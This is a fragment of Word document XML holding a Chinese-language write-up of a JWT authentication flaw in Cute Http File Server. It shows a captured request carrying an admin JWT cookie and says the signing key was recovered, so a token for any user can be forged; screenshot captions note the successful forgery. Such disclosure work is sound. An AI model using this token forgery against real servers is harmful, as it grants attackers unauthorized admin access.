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Cute Http File Server jwt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YQd2r" w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>获取admin的Cookie</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkStart w:name="u35d9ff47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该项目无注册功能,故本地搭建环境,注册admin用户,获取其Cookie</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkStart w:name="WQMeR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GET / HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: 192.168.129.1</w:t>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0</w:t>
        <w:br/>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
        <w:br/>
        <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
        <w:br/>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
        <w:br/>
        <w:t>Connection: close</w:t>
        <w:br/>
        <w:t>Cookie:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhY2MiOiJhZG1pbiIsImV4cCI6MTcwODI2NDY4NH0.Xc17butuxIOJkq1pwI8CHsNJndo8gXdjvmqfDLzh8Q4</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ;user=admin</w:t>
        <w:br/>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:bookmarkStart w:name="QS4Xy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JWT解密与伪造</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkStart w:name="u07753d05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JWT解密,payload中只含有我们刚才注册的admin用户,而不检验目前用户的密码.同时且对称密钥也解出来了.自此便可利用jwt实现任意身份的登录.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkStart w:name="uc8bae7df" w:id="5"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ud680d0e1" w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="24477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6266" cy="38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H8uj7" w:id="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实验效果</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:bookmarkStart w:name="x3v5T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before login</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:bookmarkStart w:name="ua7d75097" w:id="9"/>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:name="u17d33fde" w:id="10"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u1ebd32b1" w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="21380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3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u490015a3" w:id="12"/>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:name="u2b4ef7bf" w:id="13"/>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:name="zGHUS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successful jwt forgery</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:name="u6b8f639a" w:id="15"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ucd29424f" w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="23601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6266" cy="41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